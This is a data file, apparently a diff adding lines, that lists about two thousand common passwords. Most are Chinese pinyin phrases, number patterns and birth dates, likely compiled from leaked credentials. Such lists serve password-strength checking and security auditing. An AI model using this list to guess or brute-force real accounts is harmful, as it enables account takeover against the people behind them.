+o0o0o0o0 +aa000000 +123465 +0o0o00oo +123456pp +wang12345 +asdfghjkl +00000000a +o0o0oo00 +qweasdzxc +456456 +qaz123wsx +woaini1 +nihaoma +jingjing520 +sd123456 +zxasqw12 +bb5201314 +apple520 +wocaonima +xingfu123 +chang123 +asdfgh123 +han123456 +5201314asd +000123 +kid1412 +jj5201314 +feifei521 +asd123456789 +hao123456 +12345678q +sheng123 +yj123456 +wq5201314 +xiaowei123 +z1x2c3v4 +wang5201314 +woaini1989 +a31415926 +yl123456 +wasd123 +5203344 +q5211314 +123a123 +wodemima +asd5201314 +woaini77 +beyond +147369 +zheng520 +x123456789 +daohaozhe4 +china2008 +chenhao123 +xiaoxiao123 +w123123 +a123123a +jia123456 +l5201314 +meiyoumima +jiayou123 +112112 +0000000a +cj123456 +123654789 +meimei520 +1z2x3c4v +tianshi520 +159951 +25251325 +zxc123zxc +zm123456 +125521 +song123456 +qazwsxedc123 +q1q1q1q1 +woailaopo +zhou123 +a0123456 +yuan123456 +123456789x +mimashi1 +123456qwer +lihao123 +yangyang521 +zzz123456 +jingjing123 +huang123456 +qq147258 +duibuqi521 +888999 +feng123 +123321abc +luo123456 +11223344a +yang1991 +jiajia +kobe24 +q1w2e3r4t5y6 +7758521aa +ooo000 +z1234567 +11qqaazz +1111111q +z111111 +zb123456 +ls123456 +a7758520 +5201314w +fuckyou123 +sunshine +zhangjian +299792458 +woshishei +131415 +123123abc +shmily1314 +xiaobai520 +w1234567 +long1234 +yanyan520 +liuyang520 +1230123a +tiancai123 +cz123456 +123123asd +zxcv123456 +s5201314 +123456wo +zzzzzz +feng123456 +a1s2d3 +qq321321 +chen1992 +wei123 +cai123456 +a321321 +123456jj +aaa123123 +baobei1314 +584201314 +aa123321 +123qq123 +ff123456 +zxcvbn +woailaopo1 +12341234 +q000000 +huahua123 +147258369a +mama520 +5201314yy +q7758258 +123456bb +chen1314 +za123456 +huahua520 +woailaopo1314 +sw123456 +zzz123 +woai1314 +198712 +laozi124 +buzhidao1 +yan123456 +wangwei520 +o0o0o0 +ak47m4a1 +12345qwe +h123456789 +123456abcdef +5201314love +hl123456 +q12345678 +wangjing +jiejie520 +wc123456 +741852963 +cl123456 +qazwsx12 +love521 +nihao520 +wangkai123 +w12345 +zhuzhu521 +wangjie123 +windows123 +wuhao123 +leilei520 +110011 +shuang520 +abcde123 +xl123456 +123456y +abc123abc +wen123456 +forever1314 +yuanyuan520 +zhangyu520 +zhangyu +woaini111 +123qwe456 +123asd456 +12344321 +198612 +a123b456 +woaini000 +jin123456 +198811 +123456789asd +zj5201314 +nimabi123 +123456Aa +iloveyou521 +baby520 +q1q1q1 +qiang520 +784533 +123456ly +xiong123 +qwertyuiop +tang123456 +gao123 +yuanyuan +chenchen +woshishui123 +shanshan521 +qwertyuiop123 +121121 +yangyang520 +wenwen521 +a654321 +zf123456 +tianshi123 +yang1985 +mima1234 +love1987 +123qqq +z123456z +0000oooo +A123456 +a666666 +zhu123 +qq100200 +chen1985 +987654321a +520forever +abc1234567 +worinima +ly5201314 +c3df32ea +shanshan33 +yang1982 +windows1 +tiantian +7758991 +hx123456 +ll5201314 +12301230a +kobebryant24 +521laopo +963852741 +123456xyz +laogong520 +as5201314 +131313 +ad123456 +caonima521 +000000qq +xiaoxiao520 +qazwsxedc +yang1984 +james007 +246810 +lz123456 +operation1 +liuwei123 +tiancai +li123456789 +a1234567890 +yuan123 +jiushiaini +y123456789 +xiao1988 +computer +987654321 +770880 +q1314521 +123321qwe +wangjun520 +lq123456 +123456h +123zhang +jiang123456 +147852369 +zxczxc123 +zhangwei123 +qq666666 +520134 +happy2000 +O0O0OO00 +milan1899 +112233qq +yaoyao520 +asd321 +lijun123 +wangbo123 +456258 +qq123000 +131425 +qaz741 +sx123456 +happy2008 +summer +sa123456 +8023love +1234zxcv +123456www +zhu5201314 +zxcvb12345 +123456c +mao123456 +woaini123456 +shang123 +love1314520 +zy5201314 +dandan521 +maomao521 +zhang5201314 +123qazwsx +wei5201314 +jiang1990 +123456789qwe +a110120 +xiaozhu123 +qq654321 +jingjing521 +goodluck +123456789p +woaiwojia520 +woaiwoziji +leilei123 +123zxc123 +zhangyi123 +wangxin123 +c123456789 +wsad8246 +sq123456 +qq1111 +wobuzhidao +kaixin123 +xiaobai123 +aini3344 +a123000 +zhao1988 +asd456123 +yc123456 +666999 +3155530 +sl123456 +www5201314 +wangjun +zhangqi123 +liwei520 +imissyou +tvxq1226 +yaoyao521 +liang521 +123456789s +junjun520 +wanghui520 +asd123321 +woaini1314520 +555666 +lw123456 +wd123456 +caonima1314 +5211314qq +woaimama1314 +wangli123 +cao123456 +31415926a +ss5201314 +angel521 +yu5201314 +woaiwojia521 +zhangjie +shuang521 +benben520 +china520 +pan123456 +just4you +zgmfx10a +wo201314 +wh123456 +aaaa0000 +woshiwo123 +qazwsx123456 +z7758521 +yx123456 +k123456 +qaz123456789 +yang5201314 +lijie123 +1357924680 +zhendeaini +aabb1122 +maomao +xiaoxiao521 +sj123456 +asd1234 +16899168 +as123456789 +abcdef123 +yao123456 +qq1314 +123456zzz +ai5201314 +198511 +bh89757 +p123456 +123456kk +yangjun123 +qinaide521 +xiaoxin123 +1234rewq +aiwo1314 +yanyan521 +11111a +zk123456 +michael +5211314q +541788 +wsad123 +QQ123456 +lixin123 +www163com +888666 +loveyou +yuyang123 +mama521 +long1314 +happy520 +153624 +110110110 +199012 +password1 +xiaoqi520 +xiao1234 +a100200 +xiaohui123 +198912 +lijian123 +584211314 +19891010 +xiaowei520 +123a456 +nishizhu +5201314abc +love2000 +woshiwo +woshishei1 +wang520 +qwqw1212 +ww123123 +yan5201314 +as1314520 +qwe789456 +123456zy +19851025 +123456789aaa +lm123456 +huihui520 +my123456 +gg123456 +zxcvbnm0 +baidu123 +123456xy +chen520 +superman +16897168 +000111 +123456dd +333666 +likai123 +mylove520 +989898 +huang110 +qinaide520 +3d1415926 +1314520z +wocaonima123 +3141592654 +aa1234 +z1x2c3 +wanghui123 +jiang521 +000000q +chenyu123 +mingming +oooo0000 +wangqiang +123698745a +qq12345678 +19891021 +74108520 +dong123456 +110112 +wang1230 +wsad1234 +123456lj +369258 +wo211314 +abcd4321 +0932313 +du123456 +lk123456 +lp123456 +xh123456 +lb123456 +aini1wannian +jiejie521 +7758521z +wo5201314 +yangfan +zt123456 +a987654321 +qq159357 +zhang111 +7788250 +123654a +qw1234 +f123456789 +w12345678 +5201314aaa +444444 +wodemima123 +womendeai1314 +a3eilm2s2y +pass1234 +qweasdzxc1 +123zxcvbnm +zxc12345 +wangyan123 +qepwq520 +fuckyou +qq123456qq +19871218 +zl5201314 +m123456789 +yangfan123 +qq778899 +loveme +147896325 +qq102030 +110119120 +longlong +198711 +www123123 +123567 +xiao1314 +liuhao123 +19861010 +laopo5201314 +1215225 +123456wei +19861223 +lx5201314 +aiying1314 +1122qqww +1a2s3d +123456.. +198410 +wy5201314 +0o0o00o +xiaoyu +wangjun123 +zd123456 +liu1314520 +565656 +7758521asd +x1314520 +woshishen +112211 +19891016 +qepwq1314 +asdasdasd +waini1314 +qaz123qaz +xxx123456 +w123456w +sorry520 +123456zhang +lilei123 +1234567qq +14789632 +waini520 +cx5201314 +1qazxsw23edc +jing123 +yh123456 +12121212 +hz123456 +520521 +qaz123123 +w000000 +123321aaa +zhang888 +ww5201314 +198911 +ty123456 +521000 +qwe1234 +777777 +321456 +wangpeng +521521521 +huang1986 +yang1314 +88888888a +b123456 +54tiancai +zhou1987 +19851126 +lijing123 +w111111 +shagua520 +chen1981 +dj123456 +qwer4321 +song1987 +song123 +zhanghao +19881212 +jing123456 +zhang666 +0okm9ijn +11111111q +wangbin123 +gy123456 +kaixin1314 +beckham23 +huang521 +a147258 +huihui521 +abcdef123456 +123654abc +linlin520 +7788414 +liyang521 +wasd123456 +warcraft3 +chen5201314 +123456yang +chen1982 +5201314x +zhang007 +a123321a +a159357 +123456love +shi123456 +huang1314 +123456p +5201314zz +sunny123 +wf123456 +xiaowei +yuanyuan123 +qazwsx1234 +zhangyang +19861221 +zxcasdqwe123 +wangtao123 +1314deai +huihui123 +zhangjun +1982gonzo +dd5201314 +yaoyao123 +zhangxin +1314258 +feng1314 +xj123456 +mcgrady1 +zp123456 +19871225 +tianshi +sf123456 +genius +shanshan +song1986 +zhang1994 +200888 +li123123 +198610 +abc5201314 +19841020 +zhangxu123 +jay5201314 +5841314521 +159159 +wang1981 +asd321321 +12qw34er +1a2b3c4d5e6f +bulibuqi1314 +000ooo +123456az +112233a +19871010 +19861228 +pp5201314 +dragon +taotao123 +0000000 +12345abcd +868686 +898989 +2587758 +52001314 +linlin521 +11111q +as1234 +jy123456 +ouyang123 +lv123456 +5201314mm +www111 +19871123 +shasha520 +jin123 +xiaoli520 +111111aaa +love3344 +wj5201314 +wg123456 +123qw123 +198766 +wang1994 +135792468 +aini520 +baby5201314 +19881210 +1q2w3e4r5 +long1988 +yang1992 +123456t +131400 +19871023 +yang1983 +love1989 +kaikai520 +4everlove +5201314520 +qazqaz123 +woaini888 +110120130 +ming123 +xc123456 +trustno1 +woai123 +abc123321 +1314521qq +0123456a +999999999 +abc1234 +hp123456 +wokaonima1 +fei123456 +zhang1982 +ailaopo1314 +yang2008 +a3344520 +wuwei123 +wangzhen +su123456 +1a1a1a1a +lijing520 +198510 +doudou520 +cao123 +h5201314 +123456zhu +liu12345 +130130 +tt5201314 +yan123 +53231323 +zxczxc +bj123456 +nihaoma1 +1231512315 +123qweASD +100100 +654321a +lihao520 +liuwei +xiaojun520 +753159 +123456hy +yb123456 +xiaoxin520 +202020 +cheng1989 +wa123456 +qianqian +19881122 +woAIni1314 +wangfei123 +loveyou520 +a1a2a3 +332211 +dongdong +0o0o0o +xin123456 +loveme99 +123456ma +tingting521 +123abcd +xiaolong +520laopo +lin5201314 +q123321 +223344 +Asdf1234 +xiaoqiang +168888 +qianqian520 +585858 +110110qq +0564335 +a1234568 +xyz123456 +1122334 +liu5201314 +181818 +123456hh +qq584520 +shabi123 +a521521 +19861216 +chenjian +woaini7758 +mm5211314 +123jiayou +xiaowei521 +xiao1990 +wwwwww +luo123 +tj123456 +huang1234 +baobao +jiaojiao520 +xiao1986 +wasd1234 +123456wy +d5201314 +123456ff +315315 +332335 +zhou1986 +z7758258 +555888 +tingting520 +yangjie123 +a7895123 +laogong521 +456789 +zhangyan +jiang1986 +shanshan520 +wangyang123 +198810 +123456cs +haiyan520 +123456A +123456d +caonima520 +lei123456 +smile1314 +zx1314520 +19871026 +liuyang1 +wangyan520 +zxc123456789 +19881112 +libin123 +huang1990 +mj123456 +lt123456 +580231 +321321aa +19881225 +19881220 +woaini999 +huang1985 +aaa123456789 +a1a1a1a1 +jh123456 +linlin123 +wb123456 +252525 +woshiniba1 +asd000000 +635241 +www12345 +woaimama +1a2a3a4a +123456789c +wang1314520 +lg123456 +77585210 +a111111111 +1314159 +123321asd +hb123456 +zhuang123 +123456lp +0o0o0o0o0o +a1a1a1 +chenjie520 +jiang1987 +19861026 +235689 +110110aa +p@ssw0rd +wan123456 +liu7758521 +123456b +operation +fc123456 +z12345 +woaini1986 +wenwen +198910 +binbin123 +yy1314520 +water123 +song1234 +888168 +binbin520 +686868 +zhanglei123 +as123321 +jiandan123 +198311 +liubin123 +i8023you +wang2008 +qq0000 +lichao123 +liyan123 +369963 +111111z +zhou1983 +100200aa +1234567abc +999888 +2wsxzaq1 +zhimakaimen +2525775 +wp123456 +ch123456 +aa1234567 +long5201314 +a1a2a3a4 +hj5201314 +19841015 +19841010 +zzz111 +19861027 +lipeng123 +222333 +z1x2c3v4b5 +829475 +hq123456 +china1949 +luan78zao +2597758 +liuyang521 +123qweqwe +198710 +wangyi123 +xiaoqi123 +wangyan521 +19861220 +20082008 +zheng1988 +1234abc +df123456 +zhangli520 +feifei +asdfghjkl1 +zhao1987 +qa123456 +shen123456 +sk123456 +19861211 +19891019 +qwaszx12 +aa100200 +wangkun123 +19861126 +woaini33 +asd123zxc +19871012 +a7777777 +881212 +19861015 +li5211314 +19871227 +sc123456 +king1234 +zhangpeng +feng1986 +w7758258 +5201314y +chen12345 +waini123 +aaa12345 +asd5211314 +jiang1989 +a123456789a +jolin520 +fuckyou1 +long1987 +dong123 +1234567w +tiantian123 +chenwei520 +qwe123456789 +lj5201314 +happy365 +19871127 +123456sa +sh123456 +5201314l +ld123456 +gh123456 +13141314 +159357abc +aq1sw2de3 +w1314521 +19871025 +xiaohu520 +ren123456 +jianjian +12345asd +love1990 +eleven11 +mengmeng +851124 +liuxin123 +a102030 +qqq123123 +daohao4ma +ht123456 +woshiniba8 +forever123 +881015 +a11223344 +wangchao +beibei521 +zhou1234 +ys123456 +000000abc +19870623 +19851125 +19851123 +19851224 +wangzi123 +bryant24 +ilove1314 +d123456789 +sjonly13 +zhang001 +chen1983 +123456789m +19881020 +1314520aa +xiao520 +leilei521 +z123321 +woaini007 +1111111111 +111111111a +zxcvbn123 +841025 +nihao2008 +aa7758521 +123qwe123qwe +ym123456 +19871022 +19851023 +yatou521 +851210 +caonima2 +jiejie123 +qq110120 +19861225 +password123 +A123456789 +wangyu520 +jing520 +sb123456 +aaaa1234 +feng5201314 +5buzhidao +19841025 +198725 +wan5201314 +0123456 +123321123 +wo2wojia +zx000000 +huanhuan +123456chen +881213 +19861011 +frank123 +fan123 +1392010 +wl5201314 +jj89757 +147147 +198686 +shmily521 +oicq2000 +yuan1234 +woshino1 +zz000000 +cctv1234 +kaikai123 +198622 +zhangli123 +125125 +lan123456 +198761 +521520 +123qwerty +fang123 +19861020 +198412 +zhao1234 +babamama521 +zhangtao +zhangbo123 +112233abc +wei520 +zhuzhu +killer +fz123456 +12345q +0o9i8u7y +cheng521 +miaomiao520 +caonima110 +19871028 +xq123456 +19881111 +789987 +l1314520 +q11111111 +chen2008 +wang4585 +yang520 +hua123456 +shuang123 +1234554321 +ye123456 +fantasy +worinima1 +12345zxcvb +s5211314 +cc123123 +0p9o8i7u +m5201314 +363636 +nicholas1 +z5211314 +jing5201314 +woaini21 +123456789b +aini521 +212121 +abcdefg1 +a25257758 +wm123456 +12qw12qw +zxc123321 +xie123456 +t5201314 +sss123456 +dream123 +19841028 +fan123456 +520000 +smile123 +apple521 +fu123456 +xia123456 +xiaoyao123 +qwe5201314 +legend +758521 +19881012 +benben521 +suibian123 +3edc4rfv +5201314as +chenwei +Abcd1234 +zhy123456 +yt123456 +liujun123 +wangxin +qwe123321 +woai2008 +456321 +12345678l +shi123 +246437 +jason123 +asd1314520 +19870214 +ilove123 +tao123456 +19891015 +19891219 +12345aaa +asdf456 +liming123 +q147258369 +liqiang123 +1qa2ws +baobao1314 +aoyun2008 +lijun520 +19871013 +19891025 +meng123456 +asasas +qinqin520 +s7758521 +beibei123 +tang123 +110110a +zhaowei123 +hui123456 +womendeai +maomao1314 +lijing521 +liyong123 +tingting123 +q123123123 +zc5201314 +ai1314 +851024 +861026 +xiong520 +shuaige123 +tan123456 +19841013 +qaz5201314 +iloveyou88 +shangxin +19881018 +woaini1992 +19851213 +o0o0oo0 +woai1986 +jay19790118 +123456zj +shuai520 +as111111 +1314520w +feng1234 +lt5201314 +19871213 +19871215 +cq123456 +5caonima +123456ai +123456aA +k123456789 +liang1987 +19881117 +963963 +123654aa +wanglin521 +huang1991 +zhanghui +pk123456 +tianshi521 +7788945 +5131421 +loveyou123 +19861218 +lp5201314 +nannan520 +il0vey0u +weiwei1314 +19861120 +nishi123 +zhangjian123 +nihao521 +xiaoyi123 +811225 +aaaaaa1 +19891022 +as123654 +xiaoqiang1 +zhang1981 +fang123456 +tingting +19861017 +19861217 +19861215 +windows2000 +123456789A +qq456852 +123wang +hn123456 +19891011 +ji123456 +zhangxu520 +woaini321 +200808 +cai123 +wang123456789 +zx111111 +sky123456 +zheng123456 +nana520 +654321aa +jay123456 +lijie521 +asd147258 +an123456 +ds123456 +19841021 +mimashi0 +haha123456 +19881001 +q1q2q3q4 +woaini001 +881025 +123456zxcv +123qwer +kaixin100 +tianxia123 +19881014 +liuyu123 +19870921 +19881215 +woaini1991 +ABCD1234 +zhangjing +19891220 +19871129 +king123 +111111abc +123456zh +841124 +liang1314 +wangyan +woaiwo1314 +19881115 +qw111111 +guo123 +a74108520 +111222333 +891027 +wo94aini +yueyue520 +198722 +19831120 +0O0O00OO +aini123 +women1314 +qian123456 +a111111a +abcd5678 +5201314li +wanglin123 +987654 +zx123321 +as7758521 +19841224 +19871015 +iverson +198310 +198312 +nokia8250 +cy5201314 +1236987 +19861208 +zhang1980 +haohao520 +asd159357 +881010 +775885 +520999 +liutao123 +666666a +123456789h +198666 +yj5201314 +ying123 +7788520 +xm123456 +918918 +jkluio789 +Ab123456 +19860126 +wanglei520 +wangjing520 +king1986 +meimima +super123 +123a456a +871022 +19841984 +doudou521 +zxc5201314 +zhang000 +19861110 +xy5201314 +qwe1314520 +19881025 +19881022 +19901216 +jiejie +da123456 +chen1994 +jian123 +song1989 +baishikele +liu123123 +ABCabc123 +shanshan123 +z12345678 +shilei123 +qy7ttvj7vg +19881010 +zhangfan +841021 +s123123 +Qq123456 +123258 +19891128 +19891123 +a1230456 +19841001 +qwe321 +7894561230 +qq2008 +qq201314 +li1314520 +sakura123 +654321abc +xiaoyan123 +821028 +821022 +xiaowu520 +12345678qq +lanlan520 +yangjun520 +19860214 +dg123456 +bugaosuni +ws123123 +aa1314520 +abc000000 +yw123456 +wangbin +abc1314520 +xiaozhu521 +871125 +123321q +minmin520 +as147258 +miaomiao +asd123654 +jun5201314 +19881123 +zxcasd123 +556677 +wangjie +o0o0o0o0o0 +mn123456 +mm7758521 +liwei521 +kk5201314 +19871014 +19871017 +19871018 +c5201314 +19891023 +19891020 +zhaolei123 +monkey +qian123 +5121314 +happy2002 +198799 +cj5201314 +winner +loveyou521 +woaini22 +5201314tt +667788 +19861113 +jiangwei +996633 +huang888 +jia123 +111888 +beyond123 +841008 +34416912 +131488 +woaini456 +5201314ok +831120 +789123 +baichi123 +123456sun +yangjie +7788521a +123123zz +zhang1 +wangwei521 +zxl123456 +19861021 +881118 +allen123 +xiaoyan520 +liujian +19881013 +198633 +a000000000 +happy521 +wuliao123 +19851212 +19851216 +yuan1988 +789456123a +19861030 +a123456s +123654789a +cf123456 +123369 +123123qw +aaaaa11111 +668899 +qq789789 +love1988 +19861116 +q123q123 +zaqxsw123 +zxcvbnm123456 +ai1314520 +123456789qaz +yuanyuan521 +8008208820 +19861986 +ak123456 +l1234567 +wangqi123 +19901023 +woshizhu +831025 +zheng1987 +5201314yu +851123 +19881120 +feng520 +liuwei520 +19871001 +dong1234 +aaa888 +nannan521 +peter123 +aini99 +huanhuan520 +handsome +zhao1991 +tiger123 +hh5201314 +liufeng123 +qw123321 +123456789as +xiaofei123 +19861016 +123456789ab +123456wq +qwert1234 +19871221 +19891030 +821128 +123888 +zhou1981 +shuaishuai +han123 +19851120 +200800 +19871117 +haohaoxuexi +j123456789 +woai01314 +334420 +li000000 +yy123123 +aaa111111 +qq888888 +yangjian +fengfeng +qqwwee123 +wangyu +1029384756 +wang521 +2010000 +jiang1988 +199771 +113113 +19881015 +841028 +slamdunk +19851018 +1234566 +aq123456 +niuniu521 +999666 +yf123456 +861120 +kissme +lijia123 +liujia123 +7758258qq +123456zw +chenli520 +angel1314 +a888888 +445566 +O0O0O0O0 +liyang +13579abc +yi123456 +ling123 +s1234567 +123ewq +liang123456 +123456zaq +19841120 +821010 +junjun123 +wangjie520 +xx123123 +yueyue123 +19881125 +chenchao +123456xm +yq123456 +19861212 +19861213 +liyan520 +guoguo123 +19870306 +5201314ly +asddsa123 +wan1314520 +147258qq +123580 +hanhan521 +198671 +shmily123 +family520 +liufei123 +123456we +liyang520 +liao123456 +huanhuan123 +liang1989 +19870815 +891011 +liqiang +aaaaaa123 +zhangyu521 +qqqqqq123 +19851225 +zq5201314 +xiaoyao +123... +123156 +hou123456 +huang5201314 +wangwei1 +zhou1991 +7758258q +zzq123456 +12345qaz +love520520 +wangfei +panpan520 +bendan520 +25257758a +19881028 +zhiaini1314 +huwei123 +zzx123456 +nihaoma520 +xw123456 +xiaoxi520 +1qw23er4 +aijing1314 +zhangqiang +zx1234567 +yue5201314 +19841018 +chenjie123 +19861022 +1234567z +12345679 +asdf4321 +7451321 +19881016 +841020 +qq121212 +x123123 +0123456789 +19891125 +chenkai123 +xiaohui520 +qwaszx +yuan1986 +peng123 +xt123456 +861122 +520love +jiang1992 +yingying520 +19841212 +147258abc +woaini125 +19851020 +xiaoming +love1985 +19891119 +821026 +123521 +minmin123 +xxx123 +ly1314520 +pan123 +5201314jj +dragon123 +ye5201314 +wangji520 +xf123456 +19901020 +19861227 +871124 +7758521abc +cheng1988 +power123 +asdfasdf1 +19881128 +1987612 +jian123456 +19491001 +19881116 +xiaoma123 +weishenme1 +881226 +111213 +881126 +asd111111 +cui123456 +19861129 +19861127 +tianshi1 +1z2x3c +19871211 +123456gg +19861201 +12345wang +jl123456 +198677 +qaz753951 +t123456789 +chenwei123 +123456g +19851015 +123123123q +881014 +w1a2n3g4 +wk123456 +lili520 +141421 +161616 +wo5ai2ni1 +jaychou520 +198566 +qiang521 +19871226 +a123654789 +asdasd1 +100200qq +891010 +901020 +xuyang123 +liuqi123 +19851122 +123456mn +hong123456 +wangshuai +ww111111 +wangjing521 +feng1987 +198211 +chenqi123 +welcome +money520 +paopao123 +lin1314520 +michael1 +19861112 +19861115 +gf123456 +woaiziji1314 +dongdong520 +smile520 +aaa000000 +liuyi520 +851025 +ab1234 +lj1314520 +19861023 +a123698745 +abcdefg +198762 +wang1995 +wangjing123 +jiang1984 +jiang1985 +19841017 +521zhang +huang1992 +19861025 +wo1314520 +aixue1314 +369852 +wangyang520 +851118 +liujian123 +nba123456 +li7758521 +010101 +xiaoxin521 +520zhuzhu +zxcvbnm12 +19871128 +52woziji +5201314liu +kiss1314 +5201314zx +mylove +415263 +19871021 +123654qq +lovelove +520131 +您的出生地是? +kaixin520 +zhutou123 +123456lll +yang7758521 +tvxq20031226 +qq120120 +1234qwe +1234321 +wanglin520 +sakura +51201314 +my5201314 +xiaofeng +19881129 +woaini886 +821015 +821018 +1234qq +jiandanai +580230 +zhouwei123 +mylove1314 +a123s456 +19881226 +qaz147258 +5201314cc +asd159753 +wangzhe123 +19891211 +a741852963 +yanyan123 +881223 +881128 +321123 +sj5201314 +summer123 +woshini123 +123456oo +520520520 +xl5201314 +861028 +521123 +hanhan520 +xiaohao123 +123456789zz +zhang1230 +hao12345 +wangying +19861206 +liang1990 +19891028 +huangwei +wwww1111 +881218 +haohao +1478963 +wo7758521 +198792 +19881118 +tian1988 +516888 +19871223 +huangyan +yun5201314 +haiyang521 +ff5201314 +hanhan123 +19851124 +19851226 +jie5201314 +521forever +q2w3e4r5 +heihei123 +n123456 +0000aaaa +000000aaa +871028 +woaini55 +19861013 +a1010110 +zhangyi520 +jj5211314 +198769 +777888 +100200300 +52qq1314 +woainima1 +xiaozhu +123456lx +qi123456 +5201314m +lizheng123 +871215 +mylove123 +you123456 +xia5201314 +213344 +woainia +zhouyu123 +19871228 +00oo00oo +liangliang +911119 +881026 +2wsx1qaz +wangshuai1 +123asdfg +james123 +123456kl +19861024 +woshi250 +a13141314 +by123456 +19881216 +love12345 +198891 +19861124 +321321a +19851016 +liang110 +19851210 +811026 +fy123456 +19871125 +1qw23er45t +zhl123456 +134679852 +881127 +wo123456789 +19891110 +1314520q +baby1314 +qq1230123 +19881203 +123456123 +890616 +liuliu123 +gundam0079 +yy123456789 +19831010 +19891006 +aini1314520 +wan123 +orange +198900 +801225 +test1234 +851226 +liujie123 +zhouwei520 +19881121 +x1234567 +19860922 +19881227 +winning11 +528528 +wangliang +huang1983 +licheng123 +lijie520 +801108 +19870101 +831013 +881122 +1234aaaa +20080808 +shuang +19861123 +ling1314 +789632145 +cw123456 +wangnan123 +52baobao +lpwan1314 +001001 +1a2a3a +cs123123 +liuyan123 +yao123 +123456wa +123456ws +1z2x3c4v5b +123456789y +861022 +331234 +lilin520 +871015 +xs123456 +nn123456 +nishiwode1 +a5845201314 +198688 +123456lu +wangmeng +19880525 +ab123456789 +woaini14 +jiaojiao123 +52571314 +12345qwer +long521 +19861014 +369258147 +zhou1990 +19851110 +zhangjie123 +wangrui123 +mingming520 +hangeng520 +michael23 +198625 +198621 +861025 +a000000a +123123zx +19871224 +luo5201314 +198823 +peipei123 +2wsx3edc +198764 +19851202 +wt123456 +hw123456 +831230 +19861029 +zhangyang123 +l111111 +jian1989 +1231230 +19881017 +xin123 +7u8i9o0p +lihui521 +198966 +1314520abc +19861224 +19851011 +520baobei +19891224 +asd7758521 +19871124 +apple007 +qz123456 +panpan123 +hu5201314 +baobei +19881106 +123xyz +mengmeng520 +118118 +tian123 +deng123456 +ll1314520 +fj123456 +y5201314 +851011 +123qwert +123456lin +woaiziji +qwer12345 +daohao2b +leilei1314 +xiaojian +19851127 +123456yh +as000000 +lzh123456 +qqqqqq1 +19891001 +871120 +dc123456 +19841126 +821011 +821019 +lirui123 +cheng1986 +ABC123 +we123456 +a1314159 +lijian +shen123 +19871201 +19871007 +198724 +another +wx5201314 +xiaobao123 +520zhang +wangji123 +5201314ll +lxy123456 +xiaolong123 +lp5211314 +daohao4quanjia +fei5201314 +861030 +19871217 +250250 +19871019 +zhanghui123 +niubi74110 +dx123456 +qwe112233 +147258aa +freedom123 +zzy123456 +xiaobao520 +forever21 +5211314l +123456789zxc +801230 +killer123 +p123456789 +861029 +198600 +liang1985 +liujie520 +19891017 +198212 +19860520 +881208 +881001 +zhang159 +198788 +www1314520 +huang12345 +king1985 +861215 +jacky123 +yy5211314 +samsung +bai123456 +861223 +aini1wnian +love2010 +831225 +123456lk +woshitiancai +woaini1230 +861006 +19870410 +1232123 +Passw0rd +bao123456 +woshizhu123 +19881023 +chenyang +1230456 +198888 +wangchao123 +213213 +honey520 +19851004 +8675309 +sun5201314 +zy1314520 +19841016 +qazwsxedc1 +19861028 +mama5201314 +asd111 +qwert123456 +abcd123456789 +zxy123456 +19881217 +19881213 +format +526526 +5201314zhu +zx7758521 +54181452 +19841215 +811023 +19891124 +123456k +QQ5201314 +19891221 +asd654321 +zzz000 +19841008 +19871120 +159753asd +1010110 +nihaoya +19861104 +yanan521 +861224 +zhangchao +199010 +bb1314520 +787878 +123456zl +19881204 +a1234566 +19851029 +wq123123 +love1984 +19881011 +gogogo123 +1314520x +bao123 +ly1314521 +asd112233 +123456aq +wodeai123 +ronaldo9 +19871030 +wangdong +daidai123 +qw5201314 +19891003 +qweqweqwe +456654 +881021 +cc5211314 +xiaoyi520 +wang5211314 +b123456789 +gundam +liqian123 +zhao1984 +nihaoa123 +52yy1314 +aaa5201314 +a7788521 +nihao110 +tang1991 +19891013 +asd520 +1234wang +301415926 +881220 +abc112233 +xp123456 +871225 +wanmei123 +5tgb6yhn +chenlei123 +wen5201314 +1989abcd +chenlei520 +19870825 +carter15 +19821028 +yd123456 +hao5201314 +dw123456 +wodeai1314 +woai88mama +yu1314520 +nokia5700 +19901010 +0okmnji9 +feng1989 +liang1988 +xiao5201314 +qazqaz +a121212 +zhou5201314 +2008beijing +woshiniba +1314520mm +19861008 +xiaoxiao1 +wanglei521 +king1984 +feng1985 +19891029 +abc123def456 +liujing123 +love5211314 +jinjin123 +qq159753 +xuwei123 +0p9o8i7u6y +831123 +nihao123456 +huahua521 +19841022 +5201314s +1qaz0okm +851021 +q789456123 +aabbcc123 +198623 +hs123456 +000aaa +jk123456 +lizhen123 +19871220 +l7758521 +xiaonan521 +asdzxc +wanghao521 +jiang110 +19831023 +woshi520 +qianqian521 +zyh123456 +hong1314 +a3344521 +123456xiao +1qaz3edc +19870926 +19860315 +198899 +xiaopeng +512512 +19851215 +1234561 +abc110110 +zhangwei1 +123455 +19841004 +19841006 +yuan1989 +19880924 +sss123 +19881005 +laopo5211314 +z1314521 +199011 +liuqiang +zhaoli520 +ty5201314 +5201314ai +198866 +xiaofei +19871027 +liulei123 +wangfeng +19880214 +19841024 +ilove520 +821021 +821020 +19901120 +cheng1991 +11qq22ww +101101 +wangxin521 +zhangli521 +19881211 +3344521a +881202 +wc5201314 +357159 +weishenme +yy7758521 +19891002 +19891005 +tiger1986 +zheng1989 +xiang521 +asd00000 +1314aiziji +wangwang +secret +851127 +19871202 +123q123q +wodeai520 +7758521521 +beckham +xingxing +123456xu +z0000000 +chentao123 +machao123 +dahai123 +1415926 +zhangqi +woshishen1 +19880217 +881225 +881228 +881121 +5201314lj +xiao1991 +hangeng0209 +19861121 +19860912 +861024 +19871016 +wangtao520 +198110 +123love +19891027 +16899199 +nb74110 +woshi1988 +Password1 +wangpeng123 +yangyang00 +liu1990 +asd123asd123 +xc5201314 +ax123456 +ling5201314 +huyang123 +wanglu123 +861021 +king123456 +zhaowei520 +1qazse4 +19880130 +lifei123 +cd123456 +841213 +841012 +841010 +zhanglei520 +198210 +19870624 +q00000000 +881209 +881206 +zhou1985 +wn123456 +c7758521 +198787 +19851221 +19851223 +li1234 +19861106 +yan1314520 +19861002 +19861001 +lover123 +19851129 +nan123456 +861012 +110112119 +314159265 +123ABC +bugaosuni1 +jiaojiao +wangyue123 +xiaojie520 +jie123456 +xiongdi1314 +fanfan +19831020 +peng1990 +891120 +19870718 +yanglei123 +198699 +ding1234 +aa110110 +520240 +198501 +qin123456 +www123456789 +z123123123 +19881026 +19881024 +198626 +5201314xx +missyou +xiaoxiong +123aaa123 +881022 +cheng123456 +5201314zj +831116 +198765 +19851203 +guowei123 +19881208 +huang007 +niuniu123 +ly5211314 +w11111111 +a110120119 +woaiwo123 +861118 +hui5201314 +wodezuiai1 +wujie520 +jack123 +123456jkl +xingfu +xx7758521 +woxihuanni +OOOO0000 +851120 